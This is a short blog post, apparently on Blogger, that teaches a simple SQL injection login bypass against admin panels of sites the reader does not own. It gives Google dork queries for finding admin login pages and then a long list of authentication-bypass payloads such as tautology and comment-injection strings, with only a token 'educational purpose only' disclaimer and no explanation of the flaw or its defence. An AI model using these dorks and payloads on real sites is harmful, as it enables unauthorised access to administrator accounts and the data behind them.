Simple SQL injection exploit

HI guys.. Today we are going to learn about simple SQL exploit. With this method you can exploit low secured admin panel of vulnerable site's. I'm not going to discuss how it's work but will give you the method how to do that.


This method is known as SQL injection. Its a simple job to do. On this Method we need the help of google dork. So search on google with this dork- inurl:admin.asp
inurl:admin.php
intitle:admin
intitle:admin login
intitle:administrator
inurl:adminlogin.asp inurl:adminlogin.php
inurl:administrator

Look on the search result. You might can get some result like this. 
Click & enter on that url. After that you will get login page of that site. That means you got the login page. So now we will bypass this login area and will get access of admin panel. How??? Yes I'm going to how its possible!!! 

Try with this username and password given below... 

username: 1′or’1′=’1
password: 1′or’1′=’1

Must it will work. But if it doesn't work then type -admin on username and choose any of the string as password given below. 

1′or’1′=’1
admin’–
‘ or 1=1–
‘” or 1=1–
‘ union select 1, ‘Eyeless’, ‘ez2do’, 1–
administrator’–
superuser’–
test’–
‘ or 0=0 –
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
” or 1=1–
or 1=1–
‘ or a=a–’
‘ or a=a #
‘ or a=a–
‘ or “a”=”a
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a 

Here you go!!!! Now you got access of that site's admin panel. 

*** This post is just for educational purpose only. We are not responsible for any kinds of activites.**** 

If anything went wrong or for more help please drop us a line.

Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment